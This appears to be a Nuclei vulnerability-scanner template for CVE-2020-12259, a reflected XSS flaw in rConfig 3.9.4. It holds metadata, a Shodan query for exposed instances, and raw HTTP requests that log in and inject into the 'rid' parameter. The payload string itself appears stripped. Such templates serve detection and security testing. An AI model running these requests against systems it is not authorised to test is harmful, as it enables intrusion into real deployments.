id: CVE-2020-12259 info: name: rConfig 3.9.4 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php reference: - https://www.rconfig.com/downloads/rconfig-3.9.4.zip - https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8 - https://nvd.nist.gov/vuln/detail/CVE-2020-12259 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/Elsfa7-110/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2020-12259 cwe-id: CWE-79 epss-score: 0.16256 epss-percentile: 0.95859 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: "true" max-request: 3 vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" tags: cve2020,cve,rconfig,authenticated,xss http: - raw: - | GET /login.php HTTP/1.1 Host: {{Hostname}} - | POST /lib/crud/userprocess.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded user={{username}}&pass={{password}}&sublogin=1 - | GET /configDevice.php?rid="> HTTP/1.1 Host: {{Hostname}} host-redirects: true matchers: - type: dsl dsl: - 'status_code_3 == 200' - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' - 'contains(content_type_3, "text/html")' condition: and # digest: 4a0a004730450221008538b08ecf8b93aacaac1be17c9980fbd0271e09e3a6e8cc79cfa36012a6d45d02203407d4ecb1e8ce517abd06804bf82b38a837a545c09169a361bbf6dc879e332a:922c64590222798bb761d5b6d8e72950